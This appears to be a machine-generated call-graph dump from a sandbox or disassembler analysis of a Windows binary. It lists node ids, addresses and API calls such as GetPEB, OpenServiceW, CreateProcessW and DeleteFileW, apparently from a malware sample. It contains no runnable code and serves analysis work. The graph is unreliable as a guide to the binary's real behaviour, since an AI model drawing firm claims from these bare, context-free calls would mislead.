RtlAllocateHeap GetPEB LoadLibraryW 4048->4050 4049->4006 4050->4048 4058 225caf 4051->4058 4053 225db3 4367 223c3c 4053->4367 4055 225db1 4055->4006 4056 23da22 GetPEB 4056->4058 4058->4053 4058->4055 4058->4056 4353 2413ad 4058->4353 4377 23dcf7 4058->4377 4381 2247ce 4058->4381 4385 22a8b0 4058->4385 4069 2399cc 4061->4069 4063 239ba9 4066 231e67 2 API calls 4063->4066 4064 23dcf7 2 API calls 4064->4069 4065 239ba7 4065->4006 4066->4065 4067 2247ce GetPEB 4067->4069 4068 228f65 2 API calls 4068->4069 4069->4063 4069->4064 4069->4065 4069->4067 4069->4068 4070 22a8b0 GetPEB 4069->4070 4071 23c1ec GetPEB 4069->4071 4426 225ddd 4069->4426 4070->4069 4071->4069 4082 230859 4072->4082 4074 23dcf7 2 API calls 4074->4082 4075 2309d9 4076 238519 GetPEB 4075->4076 4081 2309ec 4076->4081 4078 230894 4438 22957d 4078->4438 4079 227ff2 RtlAllocateHeap GetPEB 4079->4082 4080 2308b3 4080->4006 4084 238519 GetPEB 4081->4084 4082->4074 4082->4075 4082->4078 4082->4079 4082->4080 4085 22a8b0 GetPEB 4082->4085 4430 229462 4082->4430 4434 230dd6 4082->4434 4084->4080 4085->4082 4087 2363a1 4086->4087 4089 238f9e 2 API calls 4087->4089 4090 236521 4087->4090 4091 23dcf7 2 API calls 4087->4091 4094 2346bb 2 API calls 4087->4094 4095 236543 4087->4095 4096 22912c 2 API calls 4087->4096 4098 22a8b0 GetPEB 4087->4098 4442 22d6d8 4087->4442 4455 221cec 4087->4455 4459 231652 4087->4459 4089->4087 4092 238f9e 2 API calls 4090->4092 4091->4087 4092->4095 4094->4087 4095->4006 4096->4087 4098->4087 4103 23888d 4099->4103 4101 238935 4101->4006 4103->4101 4482 22ee08 4103->4482 4486 23ab5e 4103->4486 4106 22651f 4104->4106 4105 238519 GetPEB 4105->4106 4106->4105 4109 224b61 GetPEB 4106->4109 4110 226bd9 4106->4110 4490 23a666 4106->4490 4500 23f435 4106->4500 4518 22cf47 4106->4518 4530 225548 4106->4530 4539 23e395 4106->4539 4109->4106 4110->4006 4118 234a28 4114->4118 4115 238f9e GetPEB CloseServiceHandle 4115->4118 4116 22912c 2 API calls 4116->4118 4117 234b7d 4117->4006 4118->4115 4118->4116 4118->4117 4120 2242c4 2 API calls 4118->4120 4704 22e249 4118->4704 4120->4118 4125 22537b 4121->4125 4122 238519 GetPEB 4122->4125 4123 227ff2 2 API calls 4123->4125 4125->4122 4125->4123 4126 22553e 4125->4126 4708 22960d 4125->4708 4712 240f33 4125->4712 4722 22924b 4125->4722 4126->4006 4130 231df2 4129->4130 4131 23aa30 GetPEB 4130->4131 4132 231e5c 4131->4132 4132->4006 4137 240720 4133->4137 4135 23dcf7 RtlAllocateHeap GetPEB 4135->4137 4136 22cb52 GetPEB 4136->4137 4137->4135 4137->4136 4139 2346bb 2 API calls 4137->4139 4141 2409a3 4137->4141 4142 231652 GetPEB 4137->4142 4143 22a8b0 GetPEB 4137->4143 4817 22f002 4137->4817 4821 22aad6 4137->4821 4825 221fd1 4137->4825 4139->4137 4141->4006 4142->4137 4143->4137 4829 235c73 4144->4829 4146 2413ad 2 API calls 4153 236a65 4146->4153 4147 236bbb 4147->4006 4148 23d25e GetPEB 4148->4153 4149 23dcf7 RtlAllocateHeap GetPEB 4149->4153 4151 2247ce GetPEB 4151->4153 4152 22a8b0 GetPEB 4152->4153 4153->4146 4153->4147 4153->4148 4153->4149 4153->4151 4153->4152 4832 23453f 4153->4832 4156 22227a 4154->4156 4155 222918 4157 240e3a GetPEB 4155->4157 4156->4155 4158 222916 4156->4158 4159 240e3a GetPEB 4156->4159 4160 227ff2 2 API calls 4156->4160 4157->4158 4158->4006 4159->4156 4160->4156 4162 22b2df 4161->4162 4163 227ff2 2 API calls 4162->4163 4170 22b6c2 4162->4170 4836 230b19 4162->4836 4843 230e53 4162->4843 4855 236df8 4162->4855 4876 234b87 4162->4876 4897 22f09b 4162->4897 4909 229714 4162->4909 4917 231889 4162->4917 4928 22b74d 4162->4928 4163->4162 4170->4006 4174 228dc4 GetPEB 4173->4174 4175 231f83 4174->4175 4175->4006 4182 23a152 4176->4182 4178 238519 GetPEB 4178->4182 4181 23a2de 4181->4006 4182->4178 4182->4181 5055 22f899 4182->5055 5058 22a9ce 4182->5058 5062 228ece 4182->5062 5066 224346 4182->5066 5073 224e7d 4182->5073 4186 225275 4185->4186 4188 227ff2 2 API calls 4186->4188 4189 2252b8 4186->4189 5081 230001 4186->5081 4188->4186 4189->4006 4192 238e25 4190->4192 4191 23d25e GetPEB 4191->4192 4192->4191 4193 238ef1 4192->4193 4193->4006 4196 22e1a7 4194->4196 4195 22e207 4198 2246be GetPEB 4195->4198 4196->4195 4197 227ff2 2 API calls 4196->4197 4199 22e205 4196->4199 5110 227af6 4196->5110 4197->4196 4198->4199 4199->4006 4202 227ff2 2 API calls 4201->4202 4203 237dc1 4202->4203 4203->4006 4205 235c73 GetPEB 4204->4205 4206 23d370 4205->4206 5114 238b55 4206->5114 4210 228ddd 4209->4210 4211 23aa30 GetPEB 4210->4211 4212 228e3e 4211->4212 4212->4006 4219 226f44 4213->4219 4214 22b6cf GetPEB 4214->4219 4215 226ffc 5118 229dcf 4215->5118 4217 226ffa 4217->4006 4218 23dcf7 2 API calls 4218->4219 4219->4214 4219->4215 4219->4217 4219->4218 4220 2247ce GetPEB 4219->4220 4221 22a8b0 GetPEB 4219->4221 4220->4219 4221->4219 4226 239d3b 4222->4226 4223 239e49 4223->4006 4224 22b6cf GetPEB 4224->4226 4226->4223 4226->4224 5141 2252c2 4226->5141 5144 229b83 4226->5144 4229 23cb83 4228->4229 4230 23dcf7 RtlAllocateHeap GetPEB 4229->4230 4231 23d0a6 4229->4231 4232 2346bb 2 API calls 4229->4232 4233 23d259 4229->4233 4236 231652 GetPEB 4229->4236 4238 22a8b0 GetPEB 4229->4238 5182 23e32e 4229->5182 4230->4229 4234 22ab87 3 API calls 4231->4234 4232->4229 4233->4233 4235 23d0d0 4234->4235 4235->4013 4236->4229 4238->4229 4244 2291be 4239->4244 4240 230da3 4240->4013 4241 228dc4 GetPEB 4241->4244 4242 238519 GetPEB 4242->4244 4243 239e56 GetPEB 4243->4244 4244->4240 4244->4241 4244->4242 4244->4243 4245 231e67 2 API calls 4244->4245 4245->4244 4258 238118 4246->4258 4248 238247 4250 22b6cf GetPEB 4248->4250 4249 23dcf7 2 API calls 4249->4258 4253 23825f 4250->4253 4251 2413ad 2 API calls 4251->4258 4252 238245 4252->4013 5202 22b1c6 4253->5202 4254 2247ce GetPEB 4254->4258 4255 23473c 4 API calls 4255->4258 4258->4248 4258->4249 4258->4251 4258->4252 4258->4254 4258->4255 4259 22a8b0 GetPEB 4258->4259 5186 223e3f 4258->5186 5195 236c49 4258->5195 4259->4258 4261 238fb3 4260->4261 4288 23aa30 4261->4288 4265 2346da 4264->4265 4266 23aa30 GetPEB 4265->4266 4267 234729 SHGetFolderPathW 4266->4267 4267->4033 4269 229149 4268->4269 4270 23aa30 GetPEB 4269->4270 4271 2291a2 OpenSCManagerW 4270->4271 4271->4033 4318 221db9 4272->4318 4276 2280db 4276->4033 4283 22a73c 4277->4283 4279 22a7f0 4329 223bc0 4279->4329 4280 23da22 GetPEB 4280->4283 4282 22a7ee 4282->4033 4283->4279 4283->4280 4283->4282 4325 22cb52 4283->4325 4285 23da3d 4284->4285 4333 23adc9 4285->4333 4289 238ffc CloseServiceHandle 4288->4289 4290 23ab1d 4288->4290 4289->4033 4294 230a0e 4290->4294 4292 23ab33 4297 22cdcd 4292->4297 4301 234087 GetPEB 4294->4301 4296 230aa6 4296->4292 4299 22cdec 4297->4299 4298 22cf0f 4298->4289 4299->4298 4302 23be27 4299->4302 4301->4296 4303 23bfb1 4302->4303 4310 22ade6 4303->4310 4306 23bff5 4308 22cdcd GetPEB 4306->4308 4309 23c029 4306->4309 4308->4309 4309->4298 4311 22adfa 4310->4311 4312 23aa30 GetPEB 4311->4312 4313 22ae57 4312->4313 4313->4306 4314 23cadf 4313->4314 4315 23caf5 4314->4315 4316 23aa30 GetPEB 4315->4316 4317 23cb50 4316->4317 4317->4306 4319 23aa30 GetPEB 4318->4319 4320 221e19 4319->4320 4321 221e22 4320->4321 4322 221e3d 4321->4322 4323 23aa30 GetPEB 4322->4323 4324 221e96 RtlAllocateHeap 4323->4324 4324->4276 4326 22cb6b 4325->4326 4327 23aa30 GetPEB 4326->4327 4328 22cbd4 4327->4328 4328->4283 4330 223bd8 4329->4330 4331 23aa30 GetPEB 4330->4331 4332 223c2d 4331->4332 4332->4282 4334 23adee 4333->4334 4335 23aa30 GetPEB 4334->4335 4336 23ae5d 4335->4336 4336->4036 4338 229371 4337->4338 4339 23aa30 GetPEB 4338->4339 4340 2293db 4339->4340 4340->4041 4342 231e7d 4341->4342 4343 23aa30 GetPEB 4342->4343 4344 231edb CloseHandle 4343->4344 4344->4041 4346 228f90 4345->4346 4347 23aa30 GetPEB 4346->4347 4348 228ff5 CreateFileW 4347->4348 4348->4041 4350 23c1fb 4349->4350 4351 23aa30 GetPEB 4350->4351 4352 23c258 4351->4352 4352->4041 4354 2413cb 4353->4354 4389 224b61 4354->4389 4357 224b61 GetPEB 4358 241637 4357->4358 4359 224b61 GetPEB 4358->4359 4360 24164d 4359->4360 4361 223bc0 GetPEB 4360->4361 4362 241666 4361->4362 4363 223bc0 GetPEB 4362->4363 4364 241681 4363->4364 4393 224ddd 4364->4393 4366 2416bf 4366->4058 4368 223c56 4367->4368 4369 23dcf7 2 API calls 4368->4369 4370 223d7a 4369->4370 4405 22a918 4370->4405 4373 22a8b0 GetPEB 4374 223da2 4373->4374 4409 231f8a 4374->4409 4376 223db4 4376->4055 4378 23dd0c 4377->4378 4379 227ff2 2 API calls 4378->4379 4380 23dd93 4379->4380 4380->4058 4382 2247f3 4381->4382 4383 22a42d GetPEB 4382->4383 4384 22480e 4383->4384 4384->4058 4386 22a8c2 4385->4386 4416 238519 4386->4416 4390 224b74 4389->4390 4397 221ea7 4390->4397 4394 224df6 4393->4394 4395 23aa30 GetPEB 4394->4395 4396 224e69 SHFileOperationW 4395->4396 4396->4366 4398 221ebc 4397->4398 4401 22702c 4398->4401 4402 227049 4401->4402 4403 23aa30 GetPEB 4402->4403 4404 221f4c 4403->4404 4404->4357 4406 22a936 4405->4406 4413 22a42d 4406->4413 4410 231f99 4409->4410 4411 23aa30 GetPEB 4410->4411 4412 231fef DeleteFileW 4411->4412 4412->4376 4414 23aa30 GetPEB 4413->4414 4415 223d95 4414->4415 4415->4373 4417 238529 4416->4417 4418 221db9 GetPEB 4417->4418 4419 2385ed 4418->4419 4422 22a30c 4419->4422 4423 22a326 4422->4423 4424 23aa30 GetPEB 4423->4424 4425 22a392 4424->4425 4425->4058 4427 225dff 4426->4427 4428 23aa30 GetPEB 4427->4428 4429 225e4f SetFileInformationByHandle 4428->4429 4429->4069 4431 229481 4430->4431 4432 23aa30 GetPEB 4431->4432 4433 2294da 4432->4433 4433->4082 4435 230df7 4434->4435 4436 23aa30 GetPEB 4435->4436 4437 230e3f 4436->4437 4437->4082 4439 229595 4438->4439 4440 23aa30 GetPEB 4439->4440 4441 2295ff 4440->4441 4441->4080 4443 22d70e 4442->4443 4444 22df52 4443->4444 4445 227ff2 RtlAllocateHeap GetPEB 4443->4445 4446 238519 GetPEB 4443->4446 4450 22df63 4443->4450 4454 238f9e 2 API calls 4443->4454 4463 2242c4 4443->4463 4467 232007 4443->4467 4471 2316af 4443->4471 4475 23d25e 4443->4475 4478 22df6f 4443->4478 4447 238519 GetPEB 4444->4447 4445->4443 4446->4443 4447->4450 4450->4087 4454->4443 4456 221d2d 4455->4456 4457 23aa30 GetPEB 4456->4457 4458 221d93 4457->4458 4458->4087 4460 231680 4459->4460 4461 22a42d GetPEB 4460->4461 4462 2316a7 4461->4462 4462->4087 4464 2242e2 4463->4464 4465 23aa30 GetPEB 4464->4465 4466 224335 OpenServiceW 4465->4466 4466->4443 4468 232033 4467->4468 4469 23aa30 GetPEB 4468->4469 4470 23209a 4469->4470 4470->4443 4472 2316f3 4471->4472 4473 23aa30 GetPEB 4472->4473 4474 23174d 4473->4474 4474->4443 4476 23aa30 GetPEB 4475->4476 4477 23d2c5 4476->4477 4477->4443 4479 22df8a 4478->4479 4480 23aa30 GetPEB 4479->4480 4481 22dfe1 4480->4481 4481->4443 4483 22ee1a 4482->4483 4484 23aa30 GetPEB 4483->4484 4485 22ee76 4484->4485 4485->4103 4487 23ab70 4486->4487 4488 23aa30 GetPEB 4487->4488 4489 23abc6 4488->4489 4489->4103 4491 23a8cb 4490->4491 4493 23dcf7 2 API calls 4491->4493 4494 22a42d GetPEB 4491->4494 4495 23aa14 4491->4495 4497 23aa12 4491->4497 4498 227ff2 2 API calls 4491->4498 4499 22a8b0 GetPEB 4491->4499 4556 224816 4491->4556 4493->4491 4494->4491 4496 238519 GetPEB 4495->4496 4496->4497 4497->4106 4498->4491 4499->4491 4514 23fc7c 4500->4514 4501 23ffc3 4502 238606 2 API calls 4501->4502 4503 23ffe0 4502->4503 4579 227f1d 4503->4579 4505 24003a 4508 238519 GetPEB 4505->4508 4507 23dcf7 2 API calls 4507->4514 4515 23ffb1 4508->4515 4509 227ff2 RtlAllocateHeap GetPEB 4509->4514 4512 22a8b0 GetPEB 4512->4515 4513 22a42d GetPEB 4513->4514 4514->4501 4514->4505 4514->4507 4514->4509 4514->4513 4514->4515 4517 22a8b0 GetPEB 4514->4517 4567 238606 4514->4567 4571 23c0c1 4514->4571 4575 22ed7e 4514->4575 4515->4106 4517->4514 4529 22cf7e 4518->4529 4520 238519 GetPEB 4520->4529 4524 22d58f 4525 238519 GetPEB 4524->4525 4526 22d5a6 4525->4526 4526->4106 4527 227ff2 2 API calls 4527->4529 4528 22ed7e GetPEB 4528->4529 4529->4520 4529->4524 4529->4526 4529->4527 4529->4528 4587 227735 4529->4587 4594 227e87 4529->4594 4598 23ae6d 4529->4598 4613 2270b3 4529->4613 4533 225577 4530->4533 4532 225969 4534 238519 GetPEB 4532->4534 4533->4532 4535 225967 4533->4535 4536 227ff2 2 API calls 4533->4536 4538 22ed7e GetPEB 4533->4538 4644 225e60 4533->4644 4650 22aefb 4533->4650 4534->4535 4535->4106 4536->4533 4538->4533 4555 23e406 4539->4555 4540 23f410 4692 222b62 4540->4692 4542 23dcf7 2 API calls 4542->4555 4543 23f426 4543->4106 4548 22a8b0 GetPEB 4548->4555 4550 222b62 GetPEB 4550->4555 4551 238519 GetPEB 4551->4555 4553 229670 GetPEB 4553->4555 4555->4540 4555->4542 4555->4543 4555->4548 4555->4550 4555->4551 4555->4553 4660 23dac6 4555->4660 4664 2288c3 4555->4664 4668 2275fa 4555->4668 4672 23408e 4555->4672 4676 222ae4 4555->4676 4680 2409b5 4555->4680 4683 23a2e8 4555->4683 4559 224836 4556->4559 4558 224b23 4560 23847f GetPEB 4558->4560 4559->4558 4561 227ff2 2 API calls 4559->4561 4562 224b21 4559->4562 4563 23847f 4559->4563 4560->4562 4561->4559 4562->4491 4564 2384a6 4563->4564 4565 23aa30 GetPEB 4564->4565 4566 238502 4565->4566 4566->4559 4568 23861f 4567->4568 4569 227ff2 2 API calls 4568->4569 4570 2386bc 4569->4570 4570->4514 4570->4570 4572 23c0e6 4571->4572 4573 22a42d GetPEB 4572->4573 4574 23c108 4573->4574 4574->4514 4576 22ed97 4575->4576 4583 237a71 4576->4583 4580 227f39 4579->4580 4581 22a42d GetPEB 4580->4581 4582 227f55 4581->4582 4582->4512 4584 237a8a 4583->4584 4585 23aa30 GetPEB 4584->4585 4586 22ee00 4585->4586 4586->4514 4590 227764 4587->4590 4588 227ff2 2 API calls 4588->4590 4589 227a10 4589->4529 4590->4588 4590->4589 4591 2279f3 4590->4591 4592 240e3a GetPEB 4590->4592 4620 240e3a 4591->4620 4592->4590 4595 227e9a 4594->4595 4596 22ed7e GetPEB 4595->4596 4597 227f16 4596->4597 4597->4529 4612 23aea5 4598->4612 4601 23baf7 4602 22957d GetPEB 4601->4602 4605 23baf5 4602->4605 4603 227ff2 2 API calls 4603->4612 4605->4529 4607 23dcf7 RtlAllocateHeap GetPEB 4607->4612 4608 229462 GetPEB 4608->4612 4609 238519 GetPEB 4609->4612 4611 22a8b0 GetPEB 4611->4612 4612->4601 4612->4603 4612->4605 4612->4607 4612->4608 4612->4609 4612->4611 4624 240b68 4612->4624 4628 237b05 4612->4628 4632 236bc6 4612->4632 4636 22a81d 4612->4636 4640 23828a 4612->4640 4616 2270dc 4613->4616 4614 235b3b GetPEB 4614->4616 4615 2274bb 4615->4529 4616->4614 4616->4615 4617 2274a7 4616->4617 4618 227ff2 2 API calls 4616->4618 4619 238519 GetPEB 4617->4619 4618->4616 4619->4615 4621 240e58 4620->4621 4622 22ed7e GetPEB 4621->4622 4623 240f24 4622->4623 4623->4589 4625 240b97 4624->4625 4626 23aa30 GetPEB 4625->4626 4627 240bfc 4626->4627 4627->4612 4629 237b37 4628->4629 4630 23aa30 GetPEB 4629->4630 4631 237b8a 4630->4631 4631->4612 4633 236bda 4632->4633 4634 23aa30 GetPEB 4633->4634 4635 236c3d 4634->4635 4635->4612 4637 22a83f 4636->4637 4638 23aa30 GetPEB 4637->4638 4639 22a89d 4638->4639 4639->4612 4641 2382a9 4640->4641 4642 23aa30 GetPEB 4641->4642 4643 238300 4642->4643 4643->4612 4646 225e82 4644->4646 4645 238519 GetPEB 4645->4646 4646->4645 4647 2264bd 4646->4647 4648 227ff2 2 API calls 4646->4648 4649 22ca90 GetPEB 4646->4649 4647->4533 4648->4646 4649->4646 4651 22af1c 4650->4651 4652 23ae6d 2 API calls 4651->4652 4653 22b0b3 4651->4653 4654 22b0e8 4651->4654 4652->4651 4656 23e274 4653->4656 4654->4533 4657 23e2a0 4656->4657 4658 23aa30 GetPEB 4657->4658 4659 23e312 4658->4659 4659->4654 4661 23dae5 4660->4661 4662 23aa30 GetPEB 4661->4662 4663 23db32 4662->4663 4663->4555 4665 2288f5 4664->4665 4666 23aa30 GetPEB 4665->4666 4667 228950 4666->4667 4667->4555 4669 22762c 4668->4669 4670 23aa30 GetPEB 4669->4670 4671 227690 4670->4671 4671->4555 4673 2340b3 4672->4673 4674 23aa30 GetPEB 4673->4674 4675 234103 4674->4675 4675->4555 4677 222b04 4676->4677 4678 23aa30 GetPEB 4677->4678 4679 222b4b 4678->4679 4679->4555 4696 2294ee 4680->4696 4689 23a519 4683->4689 4684 227ff2 RtlAllocateHeap GetPEB 4684->4689 4686 23a634 4687 23a64a 4686->4687 4688 238519 GetPEB 4686->4688 4687->4555 4688->4687 4689->4684 4689->4686 4690 22ed7e GetPEB 4689->4690 4691 238519 GetPEB 4689->4691 4700 23c032 4689->4700 4690->4689 4691->4689 4693 222b77 4692->4693 4694 23aa30 GetPEB 4693->4694 4695 222bce 4694->4695 4695->4543 4697 229511 4696->4697 4698 23aa30 GetPEB 4697->4698 4699 229566 4698->4699 4699->4555 4701 23c054 4700->4701 4702 23aa30 GetPEB 4701->4702 4703 23c0ae 4702->4703 4703->4689 4705 22e262 4704->4705 4706 23aa30 GetPEB 4705->4706 4707 22e2c1 4706->4707 4707->4118 4709 229623 4708->4709 4726 238315 4709->4726 4714 2411d1 4712->4714 4713 23dcf7 2 API calls 4713->4714 4714->4713 4715 231652 GetPEB 4714->4715 4716 227ff2 2 API calls 4714->4716 4717 241380 4714->4717 4718 22a8b0 GetPEB 4714->4718 4721 241391 4714->4721 4813 237ba6 4714->4813 4715->4714 4716->4714 4720 238519 GetPEB 4717->4720 4718->4714 4720->4721 4721->4125 4723 2292c1 4722->4723 4725 2292ac 4722->4725 4723->4125 4724 238519 GetPEB 4724->4725 4725->4723 4725->4724 4727 23832d 4726->4727 4729 23845c 4727->4729 4732 22966a 4727->4732 4733 227ff2 2 API calls 4727->4733 4735 22bb7e 4727->4735 4752 224bc7 4727->4752 4757 23907f 4727->4757 4731 238519 GetPEB 4729->4731 4731->4732 4732->4125 4733->4727 4748 22c63d 4735->4748 4739 22ca5b 4740 22957d GetPEB 4739->4740 4743 22ca59 4740->4743 4741 23dcf7 RtlAllocateHeap GetPEB 4741->4748 4742 22a958 GetPEB 4742->4748 4743->4727 4746 229462 GetPEB 4746->4748 4748->4739 4748->4741 4748->4742 4748->4743 4748->4746 4750 22ed7e GetPEB 4748->4750 4751 22a8b0 GetPEB 4748->4751 4766 22aa4d 4748->4766 4770 22b144 4748->4770 4774 221c45 4748->4774 4778 234624 4748->4778 4782 2292c7 4748->4782 4786 23ca69 4748->4786 4790 222bd9 4748->4790 4750->4748 4751->4748 4753 23ca69 GetPEB 4752->4753 4754 224c44 4753->4754 4755 238519 GetPEB 4754->4755 4756 224c57 4755->4756 4756->4727 4765 23947b 4757->4765 4758 2395cb 4759 22957d GetPEB 4758->4759 4762 2395c9 4759->4762 4760 22aa4d GetPEB 4760->4765 4761 23dcf7 RtlAllocateHeap GetPEB 4761->4765 4762->4727 4763 229462 GetPEB 4763->4765 4764 22a8b0 GetPEB 4764->4765 4765->4758 4765->4760 4765->4761 4765->4762 4765->4763 4765->4764 4767 22aa76 4766->4767 4768 23aa30 GetPEB 4767->4768 4769 22aab9 4768->4769 4769->4748 4771 22b15f 4770->4771 4772 23aa30 GetPEB 4771->4772 4773 22b1b8 4772->4773 4773->4748 4775 221c76 4774->4775 4776 23aa30 GetPEB 4775->4776 4777 221cd0 4776->4777 4777->4748 4779 234646 4778->4779 4780 23aa30 GetPEB 4779->4780 4781 2346a8 4780->4781 4781->4748 4783 2292e5 4782->4783 4784 23aa30 GetPEB 4783->4784 4785 22933c 4784->4785 4785->4748 4787 23ca7b 4786->4787 4788 23aa30 GetPEB 4787->4788 4789 23cad4 4788->4789 4789->4748 4793 223757 4790->4793 4791 238519 GetPEB 4791->4793 4792 223a7d 4795 22957d GetPEB 4792->4795 4793->4791 4793->4792 4794 227ff2 2 API calls 4793->4794 4796 223bbb 4793->4796 4798 229462 GetPEB 4793->4798 4799 23dcf7 RtlAllocateHeap GetPEB 4793->4799 4800 22cb52 GetPEB 4793->4800 4803 240b68 GetPEB 4793->4803 4804 22a8b0 GetPEB 4793->4804 4805 23d84c 4793->4805 4809 228d13 4793->4809 4794->4793 4797 223aa2 4795->4797 4796->4796 4797->4748 4798->4793 4799->4793 4800->4793 4803->4793 4804->4793 4806 23d87f 4805->4806 4807 23aa30 GetPEB 4806->4807 4808 23d8ca 4807->4808 4808->4793 4810 228d41 4809->4810 4811 23aa30 GetPEB 4810->4811 4812 228da7 4811->4812 4812->4793 4814 237bbf 4813->4814 4815 227ff2 2 API calls 4814->4815 4816 237c88 4815->4816 4816->4714 4816->4816 4818 22f02e 4817->4818 4819 23aa30 GetPEB 4818->4819 4820 22f082 4819->4820 4820->4137 4822 22ab09 4821->4822 4823 23aa30 GetPEB 4822->4823 4824 22ab6d 4823->4824 4824->4137 4826 221fe3 4825->4826 4827 23aa30 GetPEB 4826->4827 4828 222045 4827->4828 4828->4137 4830 23aa30 GetPEB 4829->4830 4831 235cbb 4830->4831 4831->4153 4833 234567 4832->4833 4834 22a42d GetPEB 4833->4834 4835 234587 4834->4835 4835->4153 4841 230d2c 4836->4841 4837 230da3 4837->4162 4838 228dc4 GetPEB 4838->4841 4839 238519 GetPEB 4839->4841 4841->4837 4841->4838 4841->4839 4842 231e67 2 API calls 4841->4842 4936 239e56 4841->4936 4842->4841 4853 23144a 4843->4853 4844 2346bb 2 API calls 4844->4853 4845 23da22 GetPEB 4845->4853 4846 231647 4846->4162 4848 2247ce GetPEB 4848->4853 4850 22a8b0 GetPEB 4850->4853 4851 23dcf7 RtlAllocateHeap GetPEB 4851->4853 4853->4844 4853->4845 4853->4846 4853->4848 4853->4850 4853->4851 4944 22b6cf 4853->4944 4948 228969 4853->4948 4952 22ea99 4853->4952 4959 22ab87 4853->4959 4873 237703 4855->4873 4857 23d2ce GetPEB 4857->4873 4858 2377d7 4858->4162 4858->4858 4861 23da22 GetPEB 4861->4873 4862 237759 4864 22ab87 3 API calls 4862->4864 4863 231e67 CloseHandle GetPEB 4863->4873 4866 237789 4864->4866 4865 22b6cf GetPEB 4865->4873 4866->4858 4867 231e67 2 API calls 4866->4867 4869 2377b2 4867->4869 4868 228969 GetPEB 4868->4873 4870 231e67 2 API calls 4869->4870 4870->4858 4871 23dcf7 2 API calls 4871->4873 4872 2247ce GetPEB 4872->4873 4873->4857 4873->4858 4873->4861 4873->4862 4873->4863 4873->4865 4873->4868 4873->4871 4873->4872 4874 22a8b0 GetPEB 4873->4874 4875 22ea99 3 API calls 4873->4875 4977 23bb23 4873->4977 4984 223de2 4873->4984 4987 23d389 4873->4987 4874->4873 4875->4873 5017 237cdb 4876->5017 4878 23570e 4879 22ab87 3 API calls 4878->4879 4880 238519 GetPEB 4878->4880 4881 235b08 4878->4881 4882 224816 2 API calls 4878->4882 4883 2346bb 2 API calls 4878->4883 4885 235b06 4878->4885 4886 23da22 GetPEB 4878->4886 4888 22cb52 GetPEB 4878->4888 4889 22b6cf GetPEB 4878->4889 4890 23dcf7 RtlAllocateHeap GetPEB 4878->4890 4892 228969 GetPEB 4878->4892 4893 23453f GetPEB 4878->4893 4894 22a8b0 GetPEB 4878->4894 4895 2247ce GetPEB 4878->4895 4896 22ea99 3 API calls 4878->4896 5020 23dedc 4878->5020 5026 238727 4878->5026 4879->4878 4880->4878 4884 231e67 2 API calls 4881->4884 4882->4878 4883->4878 4884->4885 4885->4162 4886->4878 4888->4878 4889->4878 4890->4878 4892->4878 4893->4878 4894->4878 4895->4878 4896->4878 4903 22f696 4897->4903 4898 2346bb 2 API calls 4898->4903 4899 22f88f 4899->4162 4900 23da22 GetPEB 4900->4903 4901 22b6cf GetPEB 4901->4903 4902 228969 GetPEB 4902->4903 4903->4898 4903->4899 4903->4900 4903->4901 4903->4902 4904 23dcf7 RtlAllocateHeap GetPEB 4903->4904 4905 22ab87 3 API calls 4903->4905 4906 2247ce GetPEB 4903->4906 4907 22a8b0 GetPEB 4903->4907 4908 22ea99 3 API calls 4903->4908 4904->4903 4905->4903 4906->4903 4907->4903 4908->4903 4910 229a55 4909->4910 4911 229b65 4910->4911 4915 229b63 4910->4915 5030 2246be 4910->5030 5034 23c3a0 4910->5034 5042 227c37 4910->5042 4913 239e56 GetPEB 4911->4913 4913->4915 4915->4162 4921 231c8c 4917->4921 4918 22ab87 3 API calls 4918->4921 4919 231dd2 4919->4162 4920 23da22 GetPEB 4920->4921 4921->4918 4921->4919 4921->4920 4922 22b6cf GetPEB 4921->4922 4923 228969 GetPEB 4921->4923 4924 23dcf7 2 API calls 4921->4924 4925 2247ce GetPEB 4921->4925 4926 22a8b0 GetPEB 4921->4926 4927 22ea99 3 API calls 4921->4927 4922->4921 4923->4921 4924->4921 4925->4921 4926->4921 4927->4921 4934 22ba53 4928->4934 4929 22bb5e 4929->4162 4930 22bb60 4932 239e56 GetPEB 4930->4932 4931 23c3a0 GetPEB 4931->4934 4932->4929 4933 2246be GetPEB 4933->4934 4934->4929 4934->4930 4934->4931 4934->4933 4935 227c37 GetPEB 4934->4935 4935->4934 4937 239e69 4936->4937 4940 226bf2 4937->4940 4941 226c0c 4940->4941 4942 23aa30 GetPEB 4941->4942 4943 226c8f 4942->4943 4943->4841 4945 22b6e5 4944->4945 4946 23aa30 GetPEB 4945->4946 4947 22b742 4946->4947 4947->4853 4949 228980 4948->4949 4950 23d25e GetPEB 4949->4950 4951 228a5d 4950->4951 4951->4853 4953 22eab9 4952->4953 4954 228f65 2 API calls 4953->4954 4955 22ecec 4953->4955 4956 22ecd6 4953->4956 4969 2219b8 4953->4969 4954->4953 4955->4853 4958 231e67 2 API calls 4956->4958 4958->4955 4960 22abb0 4959->4960 4961 224b61 GetPEB 4960->4961 4962 22ad67 4961->4962 4973 227f5d 4962->4973 4964 22ad99 4965 231e67 2 API calls 4964->4965 4968 22ada4 4964->4968 4966 22adc4 4965->4966 4967 231e67 2 API calls 4966->4967 4967->4968 4968->4853 4970 2219dd 4969->4970 4971 23aa30 GetPEB 4970->4971 4972 221a3f 4971->4972 4972->4953 4974 227f8e 4973->4974 4975 23aa30 GetPEB 4974->4975 4976 227fd4 CreateProcessW 4975->4976 4976->4964 4978 23bb48 4977->4978 4979 231e67 2 API calls 4978->4979 4982 23be1d 4978->4982 4983 223de2 GetPEB 4978->4983 4997 240ac8 4978->4997 5001 23d8ec 4978->5001 4979->4978 4982->4873 4983->4978 4985 23aa30 GetPEB 4984->4985 4986 223e36 4985->4986 4986->4873 4995 23d3c3 4987->4995 4989 23d82d 5013 239008 4989->5013 4991 23d82b 4991->4873 4992 224b61 GetPEB 4992->4995 4993 23dcf7 2 API calls 4993->4995 4995->4989 4995->4991 4995->4992 4995->4993 4996 22a8b0 GetPEB 4995->4996 5005 23de10 4995->5005 5009 224241 4995->5009 4996->4995 4998 240af2 4997->4998 4999 23aa30 GetPEB 4998->4999 5000 240b4e 4999->5000 5000->4978 5002 23d8ff 5001->5002 5003 23aa30 GetPEB 5002->5003 5004 23d96e 5003->5004 5004->4978 5006 23de56 5005->5006 5007 23aa30 GetPEB 5006->5007 5008 23deba 5007->5008 5008->4995 5010 224257 5009->5010 5011 23aa30 GetPEB 5010->5011 5012 2242b3 5011->5012 5012->4995 5014 23901a 5013->5014 5015 23aa30 GetPEB 5014->5015 5016 239074 5015->5016 5016->4991 5018 23aa30 GetPEB 5017->5018 5019 237d3e 5018->5019 5019->4878 5025 23df09 5020->5025 5021 23e1a5 5023 240e3a GetPEB 5021->5023 5022 23e1a3 5022->4878 5023->5022 5024 227ff2 2 API calls 5024->5025 5025->5021 5025->5022 